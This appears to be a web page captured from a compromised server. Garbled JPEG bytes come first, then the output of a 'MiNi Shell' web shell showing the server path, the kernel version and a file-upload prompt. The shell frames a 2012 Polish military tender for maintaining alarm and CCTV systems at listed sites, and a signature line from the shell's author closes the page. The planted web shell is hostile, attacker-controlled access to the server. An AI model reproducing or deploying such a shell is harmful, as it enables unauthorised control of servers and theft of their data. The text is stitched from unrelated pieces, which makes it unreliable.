JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120110/9321-N-2012.html

<p class="kh_header"><b>Kraków: Świadczenie usług w zakresie konserwacji i naprawy technicznych urządzeń sygnalizacji i alarmowania</b><br>
<b>Numer ogłoszenia: 9321 - 2012; data zamieszczenia: 10.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4228 , ul. Montelupich 3, 30-901 Kraków, woj. małopolskie, tel. 12 455 75 53, faks 12 455 75 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.army.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie konserwacji i naprawy technicznych urządzeń sygnalizacji i alarmowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie konserwacji oraz obsługi awaryjnej systemów alarmowych w obiektach JW 4228 Kraków.
1) Systemy i urządzenia alarmowe powinny być remontowane, konserwowane i poddawane przeglądom technicznym zgodnie z PN - 93/E-08390/14 - Systemy alarmowe - Wymagania ogólne - Zasady stosowania oraz Normą Obronną NO -04- A004-8 2006 Obiekty wojskowe - Systemy alarmowe-Część 8: Eksploatacja.
2) Przegląd i konserwacja okresowa powinna być przeprowadzana raz na trzy miesiące. Podczas każdej konserwacji okresowej należy wykonać następujące sprawdzenia i wszelkie niezbędne poprawki:
a) sprawdzenie instalacji, rozmieszczenia i zamocowania całego wyposażenia i urządzeń, b) sprawdzenie poprawności działania wszystkich czujek, łącznie z urządzeniami uruchamianymi ręcznie, c) sprawdzenie zgodności z wymaganiami wszystkich połączeń giętkich, d) sprawdzenie czy zasilacze główne i rezerwowe pracują i są sprawne, e) sprawdzenie centrali i jej obsługi zgodnie z procedurą zakładu instalacji alarmowych, f) sprawdzenie poprawności działania każdego urządzenia transmisji alarmu przy współpracy z odpowiedzialną władzą albo zainteresowanym alarmowym centrum odbiorczym, g) sprawdzenie poprawności działania każdego akustycznego sygnalizatora alarmowego, h) sprawdzenie czy system alarmowy jest całkowicie w stanie gotowości do pracy, i) sprawdzenie funkcjonowania urządzeń transmisji sygnałów, j)	sprawdzenie i pełna konserwacja akumulatorów i zasilaczy, k) sprawdzenie stanu izolacji przewodów oraz przegląd puszek połączeniowych 
3) Przyrządy i narzędzia używane do konserwacji i testowania systemu powinny być   sprawne z ważnym świadectwem legalizacji.
4)  Zakres prac konserwacyjnych oraz obsługi awaryjnej:
a) konserwacja urządzeń systemów alarmowych i systemów telewizji przemysłowej dokonana będzie czterokrotnie, po raz pierwszy - w okresie od stycznia do marca 2012 r., następnie w okresie od kwietnia do czerwca 2012 r., następnie w okresie od lipca do września 2012 r., oraz w okresie od października do grudnia 2012 r., b) ponadto w przeciągu roku kalendarzowego 2012 dokonanie przeglądu rocznego zgodnie z Normą Obronną NO -04- A004-8 2006 Obiekty wojskowe - Systemy alarmowe-Część 8: Eksploatacja, c) podczas przeglądu rocznego wydanie ekspertyzy dla urządzeń wchodzących w skład systemów alarmowych, którym przedłużono okres eksploatacji po wykonaniu badania systemu i urządzenia według algorytmów określonych w Normie Obronnej NO -04- A004-8 2006, d) konserwacja powinna być przeprowadzona zgodnie z PN-93/E-08390/14 Systemy alarmowe. Wymagania ogólne oraz Normą Obronną NO -04- A004-8 2006 Obiekty wojskowe - Systemy alarmowe-Część 8: Eksploatacja, e)	w trakcie konserwacji danego systemu ochrony wykonawca wykona naprawę ewentualnych uszkodzeń stwierdzonych podczas konserwacji. Naprawa obejmuje również wymianę uszkodzonych urządzeń na nowe, jeżeli zajdzie taka konieczność,f) po zakończeniu konserwacji danego systemu ochrony oraz naprawie ewentualnych uszkodzeń wykonawca sporządzi protokół oraz inną niezbędną dokumentację stwierdzającą stan techniczny objętych konserwacją urządzeń wg wzoru ustalonego przez zamawiającego, g) po przeprowadzeniu przeglądu rocznego wykonawca sporządzi protokół według wzoru określonego przez zamawiającego oraz sporządzi ocenę stanu technicznego na urządzenia, którym minął minimalny okres użytkowania urządzenia, h) w ramach niniejszego zamówienia wykonawca zapewni prowadzenie całodobowego dyżuru serwisowego (czas reakcji 4 godziny od momentu zgłoszenia awarii), i)	sprawdzenie działania, aktualizacji oprogramowania oraz aktualizacji opisów w systemie kontroli wartowników SEVEN GUARD, j) wykonanie innych czynności konserwacyjnych zalecanych przez producentów i instalatorów urządzeń, k) potwierdzeniem wykonania prac konserwacyjnych lub obsługi awaryjnej będzie protokół wg wzoru ustalonego przez zamawiającego oraz wpis w Rejestrze napraw, przeglądów technicznych oraz konserwacji systemów i urządzeń alarmowych,
l) usuwanie awarii tj.: uszkodzeń systemu wynikłych z przyczyn losowych (np. wyładowań atmosferycznych, przepięć w liniach energetycznych, zalań, pożarów);
uszkodzeń zaistniałych w wyniku obsługi systemu przez osoby nieuprawnione lub niezgodnie z jego przeznaczeniem; mechanicznych uszkodzeń elementów systemu alarmowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie: 1. oświadczenia wykonawcy zgodnego z art. 22 ust 1 ustawy Pzp, 2. koncesji wydanej przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego. Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie: 1. oświadczenia wykonawcy zgodnego z art. 22 ust 1 ustawy Pzp, 2.wykazu usług o charakterze tożsamym z usługą będącą przedmiotem  zamówienia, wykonanych w ciągu ostatnich 3 lat przed upływem terminu składania ofert,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzającego, że wykonawca zrealizował w tym okresie co najmniej dwie usługi o charakterze tożsamym z usługą będącą przedmiotem zamówienia. W przypadku składania ofert na więcej niż jedno zadanie wykonawca musi udokumentować spełnianie warunku posiadania doświadczenia oddzielnie dla każdego zadania, przy czym wykazane zamówienia nie mogą się powtarzać, 3. dokumentów potwierdzających, że usługi wymienione w wykazie zostały wykonane należycie. Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie: 1. oświadczenia wykonawcy zgodnego z art. 22 ust 1 ustawy Pzp, Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie: 1. oświadczenia wykonawcy zgodnego z art. 22 ust 1 ustawy Pzp, 2. wykazu osób które będą wykonywać zamówienie wraz z informacjami na temat ich kwalifikacji zawodowych, potwierdzającego że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj: a) co najmniej 2 licencjonowanymi pracownikami zabezpieczenia technicznego I stopnia posiadającymi upoważnienie kierownika jednostki organizacyjnej do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE lub poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych o klauzuli tajności ZASTRZEŻONE lub wyższej, b)	oraz co najmniej 2 licencjonowanymi pracownikami zabezpieczenia technicznego II stopnia sprawującymi funkcje kierownicze, posiadającymi poświadczenia bezpieczeństwa osobowego o klauzuli co najmniej POUFNE. Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie: 1. oświadczenia wykonawcy zgodnego z art. 22 ust 1 ustawy Pzp, Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony druk Oferta - w druku oferta należy wypełnić oświadczenie o dysponowaniu przez wykonawcę pełnomocnikiem ds. ochrony informacji niejawnych oraz oświadczenie o dysponowaniu przez wykonawcę obsługą kancelarii upoważnioną do przetwarzania informacji niejawnych (zamawiający wymaga aby wykonawca dysponował pełnomocnikiem ds. ochrony przeszkolonym przez służby ochrony państwa, posiadającym zaświadczenie o przeszkoleniu w zakresie ochrony informacji niejawnych oraz poświadczenie bezpieczeństwa osobowego o klauzuli co najmniej POUFNE; oraz obsługą kancelarii upoważnioną do przetwarzania informacji niejawnych, posiadającą zaświadczenie stwierdzające odbycie szkolenia w zakresie ochrony informacji niejawnych oraz poświadczenie bezpieczeństwa osobowego o klauzuli co najmniej POUFNE;
2. Oryginał lub kopię pełnomocnictwa albo inny dokument (np. kopia aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej) dla osoby/osób podpisującej/podpisujących ofertę, upoważniający do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych. 
W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie. W przypadku udzielenia pełnomocnictwa, wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy dla poszczególnych czynności.
3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy, zgodnie z art. 23 ust. 2 ustawy zobowiązani są do ustanowienia pełnomocnika do reprezentowania tych podmiotów w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarciu umowy. Pisemne pełnomocnictwo należy dołączyć do oferty.
4.W przypadku, gdy wykonawca będzie polegał  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków- zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - uśredniona cena brutto 1 roboczogodziny napraw awaryjnych - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku otrzymania przez zamawiającego decyzji przełożonych wyższego szczebla dotyczących zmiany w zadaniach ochronnych realizowanych przez JW 4228, zamawiający zastrzega sobie możliwość wprowadzenia zmiany do umowy polegającej na: a) ograniczeniu terminu świadczenia usług na poszczególnych obiektach, bez możliwości dochodzenia przez wykonawcę roszczeń z tego tytułu;b) zmianie  miejsca wykonywania usługi w obszarze danej miejscowości, c)  ograniczenie zakresu zamówienia - zmniejszenie liczby obiektów, w których wykonywane maja być usługi będące przedmiotem zamówienia bez możliwości dochodzenia przez wykonawcę roszczeń z tego tytułu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4228, ul. Montelupich 3, 30-901 Kraków, bud. 28, pok. 12, godz. 8.00-15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2012 godzina 10:00, miejsce: Jednostka Wojskowa 4228, ul. Montelupich 3, 30-901 Kraków, bud. 28 - kancelaria jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług w zakresie konserwacji i naprawy technicznych urządzeń sygnalizacji i alarmowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> konserwacja oraz obsługa awaryjna SSWiN, KD, CCTV i ppoż. w Jednostce Wojskowej 4228 Kraków obiekty:
-  Kraków - ul. Montelupich 3 oraz ul. Skrzatów 2, 30-901 Kraków,
-  Kłaj - 32-015 Kłaj,
-  Niedźwiedź - 32-090 Słomniki,
- Rzeszów - ul. Krakowska 11 B, 35 - 901 Rzeszów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. uśredniona cena brutto 1 roboczogodziny napraw awaryjnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług w zakresie konserwacji i naprawy technicznych urządzeń sygnalizacji i alarmowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja oraz obsługa awaryjna SSWiN, KD, CCTV i ppoż.w Jednostce Wojskowej 4228 Kraków obiekty:
- Stawy - 08-530 Dęblin,
- Stężyca - ul. Dęblińska 149, 08-540 Stężyca,
- Życzyn - 08-455 Trojanów,
- Jawidz - 21-077 Spiczyn,
- Dęblin - ul. Saperów 3, 08-530 Dęblin,
- Lublin - Aleje Racławickie 44, 20-043 Lublin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. uśredniona cena brutto 1 roboczogodziny napraw awaryjnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usług w zakresie konserwacji i naprawy technicznych urządzeń sygnalizacji i alarmowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacja oraz obsługa awaryjna SSWiN, KD, CCTV i ppoż. w Jednostce Wojskowej 4228 Kraków obiekty:
- Kutno - ul. Bohaterów Walk Nad Bzura, 99-300 Kutno,
- Gałkówek - ul. Łódzka 26, 95-041 Gałkówek,
- Łowicz - ul. Jana Pawła II 1, 99-400 Łowicz,
- Regny - 95-040 Koluszki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. uśredniona cena brutto 1 roboczogodziny napraw awaryjnych - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com